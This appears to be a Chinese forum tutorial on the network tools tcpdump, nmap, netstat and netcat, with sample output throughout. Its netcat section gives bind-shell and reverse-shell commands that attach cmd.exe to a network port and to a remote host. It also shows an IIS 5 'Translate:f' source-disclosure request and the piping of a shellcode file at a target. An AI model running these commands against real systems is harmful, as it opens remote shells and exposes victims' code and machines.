Tcpdump- 转储网络上的数据流 Tcpdump 能够截获当前所有通过本机网卡的数据包。它拥有灵活的过滤机制,可以确保得到想要的数据。由于Tcpdump 只能收集通过本机的数据,因此它的应用受到了一些限制,大多应用在网关或服务器自我检测上。例如,在作为网关的主机上,想知道本地网络中IP 地址为192.168.0.5 的主机现在与外界通信的情况,就可以使用如下命令: tcpdump -i eth0 src host 192.168.0.5 在默认情况下,Tcpdump 会将数据输出到屏幕。如果数据量太大,可能根本看不清具体的内容,这时我们可以把它重定向到文件再进行分析。如果眼神不错,就可以清楚地了解这位仁兄刚才的一举一动: 访问了新浪网主页 20:05:32.473388 192.168.0.5.1872 >; [url]www.sina.com.http:[/url] S 1372301404:1372301404(0) win 64240 ; (DF) …… 进行了netbios 广播进行名字查询 20:05:33.823388 192.168.0.5.netbios-dgm >; 192.168.0.255.netbios-dgm: NBT UDP PACKET(13[img]http://bbs.chinaunix.net/images/smilies/icon_cool.gif[/img] …… 到新华网POP3 服务器收信 20:05:41.953388 192.168.0.5.1878 >; pop.xinhuanet.com.pop3: S 1374956462:1374956462(0) win 64240 ; (DF) …… 到深圳963 收信 20:05:45.633388 192.168.0.5.1881 >; szptt154.szptt.net.cn.pop3: P 34:40(6) ack 146 win 64095 (DF) …… 例如,上面这条信息表明了在20:05:45 的时候,192.168.0.5 通过1881 源端口连接到963 电子邮局的POP3 端口。对于普通的网络分析,这些信息已经足够了。这就是Tcpdump 的基本功能,其它高级功能都是在这一基础上的细化和增强。 例如,我只想知道192.168.0.5 当前正在访问哪些Web 站点,可以用下面这条命令: tcpdump -i eth0 src host 192.168.0.5 and dst port 80 该命令的目的是截获所有由eth0 进入、源地址(src) 为192.168.0.5 的主机(host) ,并且(and) 目标(dst) 端口(port) 为80 的数据包。得到的数据如下: 20:05:32.473388 192.168.0.5.1872 >; [url]www.sina.com.http:[/url] S 1372301404:1372301404(0) win 64240 ; (DF) …… 20:06:33.42344 192.168.0.5.1873 >; [url]www.sohu.com.http:[/url] S 1374301404:1374301404(0) win 64245 ; (DF) …… 20:07:31.343248 192.168.0.5.1874 >; [url]www.21cn.com.http:[/url] S 1377301404:1377301404(0) win 64241 ; (DF) …… 显然,通过and 或者not 这些逻辑组合,就可以得到特定的数据。Tcpdump 还可以监听不同的数据类型(如TCP 、UDP ),以用不同的网络范围(如Host 主机、Net 网络),甚至用Ether 直接指定物理地址。 用Tcpdump 在网络中获取信息如此清晰,是不是有一种一览无余的感觉。正是因为Tcpdump 功能过于强大,连个人隐私和敏感数据的保护都成了问题,所以通常只有root 用户能够使用这一工具。 Nmap Nmap 设计的初衷是系统管理员可以方便地了解自己的网络运行情况,例如有多少台主机在运行、分别提供什么样的服务。因此,它扫描的速度非常快,尤其适合大型网络。在对网络进行扫描时,Nmap 主要利用ICMP echo 探测主机是否开启。凡是了解TCP/IP 协议的都知道,对于一个TCP 端口,无论是否使用防火墙进行过滤,该主机都会对该端口发出的请求做出一定响应。所以即使配置了严格的防火墙规则,nmap 照样可以找到这些主机。例如,在一台IP 地址为192.168.0.1 的Linux 主机上执行下列命令: echo 1 >; /proc/sys/net/ipv4/icmp_echo_ignore_all 它的作用就是对所有ICMP echo 不予理睬,也就是让通常用来测试网络的Ping 命令失效。这样至少可以抵挡POD(Ping of Death) 的攻击。在任何一台机器上Ping 这台主机,得到的都会是请求超时,如: Pinging 192.168.0.1 with 32 bytes of data: Request timed out. Request timed out.Request timed out.Request timed out. Ping statistics for 192.168.0.1: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss) 这台主机是否下线了?用Nmap 探测试试看: nmap -sP 192.168.0.1 Starting nmap V. 2.54BETA22 ( [url]www.insecure.org/nmap/[/url] ) Host gw.somewhere.net (192.168.0.1) appears to be up. 探测结果好像该主机还开着呢!这里,-sP 指定使用Ping echo 进行扫描(Scan) 。 利用这一特点,可以很快知道目的网络究竟有多少主机处于运行状态: nmap -sP 192.168.0.0/24 //24 表明目标是一个网络而非单个主机 Starting nmap V. 2.54BETA22 ( [url]www.insecure.org/nmap/[/url] ) Host (192.168.0.2) appears to be up. Host [url]www.somesite.net[/url] (192.168.0.5) appears to be up. Host (192.168.0.[img]http://bbs.chinaunix.net/images/smilies/icon_cool.gif[/img] appears to be up. …… Host (192.168.0.253) appears to be up. Host fake.somesite.net (192.168.0.254) appears to be up. Nmap run completed -- 256 IP addresses (19 hosts up) scanned in 6 seconds 既然已经知道了哪些主机还开着,就可以进一步探测这些主机的信息,如开启的端口、提供的服务及操作系统类型等。从上面扫描的结果可以知道,192.168.0.5 这台机器正在运行。想要了解该主机的详细信息,可以执行: nmap 192.168.0.5 稍后会显示如下内容: Starting nmap V. 2.54BETA22 ( [url]www.insecure.org/nmap/[/url] ) Interesting ports on [url]www.somewhere.net[/url] (192.168.0.5): (The 1537 ports scanned but not shown below are in state: closed) Port State Service 80/tcp open http 135/tcp open loc-srv 139/tcp open netbios-ssn 443/tcp open https 1031/tcp open iad2 1433/tcp open ms-sql-s Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds 由上可以断定,这是一台运行Windows 操作系统的主机,因为它开启了MS SQL Server 的专用端口1433 ,还提供了HTTP 服务等。这些信息如果被不怀好意的人得到,就可以采用对应的攻击办法。其实,强大的Nmap 本身就可以依据TCP/IP 的指纹特征猜测对方使用的操作系统。我们可以用-O 来开启这一选项: nmap -O 192.168.0.5 得到的结果是: Starting nmap V. 2.54BETA22 ( [url]www.insecure.org/nmap/[/url] ) Interesting ports on [url]www.somewhere.net[/url] (192.168.0.5): (The 1536 ports scanned but not shown below are in state: closed) Port State Service 80/tcp open http 135/tcp open loc-srv 139/tcp open netbios-ssn 443/tcp open https 1032/tcp open iad3 1433/tcp open ms-sql-s Remote operating system guess: Microsoft NT 4.0 Server SP5 + 2047 Hotfixes Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds 它猜测的远程主机类型是Microsoft NT 4.0 Server SP5 + 2047 Hotfixes ,并且相当准确和详尽。 Netstat Netstat 主要用于Linux/Unix 主机察看自身的网络状况,如开启的端口、在为哪些用户服务以及服务的状态等等。此外,它还显示系统路由表、网络接口状态等。可以说,它是一个综合性的网络状态察看工具,不过中规中举。 例如在一台普通Linux 服务器上运行Netstat ,显示可能像这样: Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 xxx.net.http-alt xxx.net:1209 ESTABLISHED tcp 0 0 xxx.net.http-alt xxx.net:1509 ESTABLISHED tcp 0 0 xxx.net.ssh whoami.net:1867 ESTABLISHED tcp 0 0 xxx.net:1209 xxx.net.http-alt ESTABLISHED tcp 0 0 xxx.net:1509 xxx.net.http-alt ESTABLISHED Active UNIX domain sockets (w/o servers) Proto RefCnt Flags Type State I-Node Path unix 8 [ ] DGRAM 858 /dev/log unix 2 [ ] DGRAM 190986 unix 2 [ ] DGRAM 190051 unix 2 [ ] DGRAM 1252 unix 2 [ ] DGRAM 1233 unix 2 [ ] DGRAM 1049 unix 2 [ ] DGRAM 867 unix 2 [ ] STREAM CONNECTED 507 下半部分被称作Unix 域套接口,通常不必在意。有用的是上半部被称为有源TCP 连接的部分,它显示了当前所有已建立的连接。由此不难看出,当前这台服务器与主机myself.net 有一些处于半关闭状态的HTTP 连接,还与主机whoami.net 有一个SSH 连接。 在默认情况下,Netstat 只显示已建立连接的端口。要显示处于监听状态的所有端口,使用-a 参数即可: Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:http-alt *:* LISTEN tcp 0 0 *:8009 *:* LISTEN tcp 0 0 *:mysql *:* LISTEN tcp 0 0 *:netbios-ssn *:* LISTEN tcp 0 0 *:http *:* LISTEN tcp 0 0 *:ftp *:* LISTEN tcp 0 0 xxx.net.http-alt xxx.net:1209 ESTABLISHED tcp 0 0 xxx.net.http-alt xxx.net:1509 ESTABLISHED tcp 0 0 xxx.net.ssh myself.net:1867 ESTABLISHED tcp 0 0 xxx.net:1209 xxx.net.http-alt ESTABLISHED tcp 0 0 xxx.net:1509 xxx.net.http-alt ESTABLISHED …… 这样,当前正在监听但并未建立连接的端口也可以显示了出来。由此不难看出,这台服务器同时提供HTTP 、FTP 、SSH 、NMBD 及一个MySQL 数据库服务。 Netstat 还可以方便地代替route 命令显示当前核心路由表: netstat -r Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 218.208.80.176 * 255.255.255.248 U 40 0 0 eth1 192.168.0.0 * 255.255.255.0 U 40 0 0 eth0 127.0.0.0 * 255.0.0.0 U 40 0 0 lo default x.x.x.x 0.0.0.0 UG 40 0 0 eth1 以上结果与route 显示完全一样。 此外,它还可以代替ifconfig 显示网络接口状态: netstat -i Kernel Interface table Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVRTX-OK TX-ERR TX-DRPTX-OVR Flg eth0 1500 0 3441803 0 0 0 3717339 0 0 0 BMRU eth0: 1500 0 - no statistics available - BMRU eth0: 1500 0 - no statistics available - BMRU eth1 1500 0 1770949 0 0 0 1496183 0 0 0 BMRU lo 16436 0 38255 0 0 0 38255 0 0 0 LRU
nc
netcat 被誉为网络安全界的‘瑞士军刀' ,一个简单而有用的工具,透过使用TCP 或UDP 协议的网络连接去读写数据。
它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,
能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能( 详情请看下面的使用方法) 。 在中国,它的WINDOWS 版有两个版本,一个是原创者Chris Wysopal 写的原版本,另一个是由‘红与黑' 编译 后的新‘浓缩' 版。‘浓缩' 版的主程序只有10 多KB (10 多KB 的NC 是不能完成下面所说的第4 、第5 种使用方法, 有此功能的原版NC 好象要60KB :P ),虽然" 体积" 小,但很完成很多工作。 1 、基本使用 想要连接到某处: nc [-options] hostname port[s] [ports] ... 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [ 危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的IP 地址,不能用hostname -o file 记录16 进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -u UDP 模式 -v 详细输出——用两个-v 可得到更详细的内容 -w secs timeout 的时间 -z 将输入输出关掉——用于扫描时 其中端口号可以指定一个或者用lo-hi 式的指定范围。 例如:扫描端口 tcp 扫描 C:/nc>nc -v -z -w2 192.168.0.80 1-140 net [192.168.0.80] 140 (?) net [192.168.0.80] 139 (netbios-ssn) open net [192.168.0.80] 138 (?) net [192.168.0.80] 137 (netbios-ns) net [192.168.0.80] 136 (?) net [192.168.0.80] 135 (epmap) open net [192.168.0.80] 81 (?) open net [192.168.0.80] 80 (http) open net [192.168.0.80] 79 (finger) net [192.168.0.80] 25 (smtp) open net [192.168.0.80] 24 (?) net [192.168.0.80] 23 (telnet) net [192.168.0.80] 21 (ftp) udp 扫描 C:/nc>nc -u -v -z -w2 192.168.0.80 1-140 net [192.168.0.80] 140 (?) open net [192.168.0.80] 139 (?) open net [192.168.0.80] 138 (netbios-dgm) open net [192.168.0.80] 137 (netbios-ns) open net [192.168.0.80] 54 (?) open net [192.168.0.80] 53 (domain) open net [192.168.0.80] 38 (?) open net [192.168.0.80] 37 (time) open net [192.168.0.80] 7 (echo) open
高级应用 1 .Window 用法: (1 )IE 的MIME 欺骗 http://www.try2hack..nl(?..... 客技术的人去做实验的站点) 打开这个页面,有http://www.try2hack.nl/cgi-bin/level7.pl 页面(这个网站提供了黑客的8 关,过了这8 关证明你开始入门了),这个页面告诉我们的浏览器不是 IE6.72, 我们的* 作系统不是LIUNX, 我们不是从www.microsoft.com/ms.htm 重定向链接过去的,有病阿(这是一个题目呀,要慢慢研究),linux 有IE6.72? 微软会在它的页面上放http://www.try2hack.nl/cgi-bin/level7.pl 的链接?看看页面的源代码,level7.pl 是在服务器端 执行的perl 脚本,根本无法看到,还是研究一下IE5 和它通信时都告诉了它什么,抓包,我们会发现,我们的IE5 告诉对方: 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705 。。。。哈哈,level7.pl 这个cgi 应该是根据这些信息知道我们不是它要求的 客户,嘿嘿,需要欺骗对方才行,用军刀来可以实现,如下做就可以哄对方了: nc http://www.try2hack.nl 80 [enter] GET /cgi-bin/level7.pl HTTP/1.1 [enter] Accept: image/gif, image/x-xbitmap, application/msword, */* [enter] Refererhttp://www.microsoft.com/ms.htm [enter] Accept-Language: zh-cn [enter] Accept-Encoding: gzip, deflate [enter] User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; Linux 8.8.8 i986) [enter] Host: http://www.try2hack.nl [enter] Connection: Keep-Alive [enter] 注意,如果出现HTTP 400 时,说明你输入格式有问题,出现httpd 200 回应时,就给出结果了: 哈哈!赶快去实现一下(实践是成功之母) (2 )IIS 5 “Translate:f ” 显示代码脆弱点 Translate:f 脆弱点的机制:发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型(例如.ASP 或者global.asa )。这些文件是用于服务器上运行的,绝不会到客户机上去,而这个请求就会导致IIS 将这种文件的内容发送到远端的客户机上,而不是在服务器上运行。这种畸形的HTTP GET 请求的关键特性是该请求的末尾有一个特定的头信息Translate:f ,并有一个反斜杠”/ ”附于URL 之后。下面就有这样的一个例子([CRLF] 代表回车字符) 注意 GET global.asa 后的反斜杠以及Translate:f 头信息。 GET /global.asa/ HTTP/1.0 Host:192.168.0.1 User-Agent:SensePostData Content-Type:application/x-www-form-urlencoded Translate:f [CRLF] [CRLF] 将以上内容保存在一个文本文件中(例如example.txt ) 然后向一个有这个漏洞的服务器发送 c:/>type example.txt | nc –nvv 192.168.0.80 80 (UNKNOWN) [192.168.0.80] 80 (?) open HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 03 Dec 2002 08:50:46 GMT Content-Type: application/octet-stream Content-Length: 2790 ETag: “0448299fcd6df1:bea ” Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT Accept-Ranges: bytes Cache-Control: no-cache 举例: 1) 连接到REMOTE 主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x 的TCP80 端口 2) 监听LOCAL 主机,例子: 格式:nc -l -p 80 讲解:监听本机的TCP80 端口 3) 扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x 的TCP80 到TCP445 的所有端口 4)REMOTE 主机绑定SHELL ,例子: 格式:nc -l -p 5354 -t -e c:/winnt/system32/cmd.exe 讲解:绑定REMOTE 主机的CMDSHELL 在REMOTE 主机的TCP5354 端口 5)REMOTE 主机绑定SHELL 并反向连接,例子: 格式:nc -t -e c:/winnt/system32/cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE 主机的CMDSHELL 并反向连接到192.168.x.x 的TCP5354 端口 以上为最基本的几种用法(其实NC 的用法还有很多, 当配合管道命令"|" 与重定向命令"<" 、">" 等等命令功能更强大...... )。 ===================================================================================================== 高级用法: 6) 作攻击程序用,例子: 格式1 :type.exe c:/exploit.txt|nc -nvv 192.168.x.x 80 格式2 :nc -nvv 192.168.x.x 80 < c:/exploit.txt 讲解:连接到192.168.x.x 的80 端口,并在其管道中发送'c:/exploit.txt' 的内容( 两种格式确有相同的效果, 真是有异曲同工之妙:P) 附:'c:/exploit.txt' 为shellcode 等 7) 作蜜罐用[1] ,例子: 格式:nc -L -p 80 讲解:使用'-L'( 注意L 是大写) 可以不停地监听某一个端口,直到ctrl+c 为止 8) 作蜜罐用[2] ,例子: 格式:nc -L -p 80 > c:/log.txt 讲解:使用'-L' 可以不停地监听某一个端口,直到ctrl+c 为止,同时把结果输出到'c:/log.txt' 中,如果把‘>' 改为‘>>' 即可以追加日志 附:'c:/log.txt' 为日志等 9) 作蜜罐用[3] ,例子: 格式1 :nc -L -p 80 < c:/honeypot.txt 格式2 :type.exe c:/honeypot.txt|nc -L -p 80 讲解:使用'-L' 可以不停地监听某一个端口,直到ctrl+c 为止,并把'c:/honeypot.txt' 的内容‘送' 入其 管道中
如果要对tcpdump抓到的包进行分析的话,最好使用-w选项保存到文件,方便用etherreal/wireshark进行分析. 出于安全,nc最好自己找到源码进行编译安装.
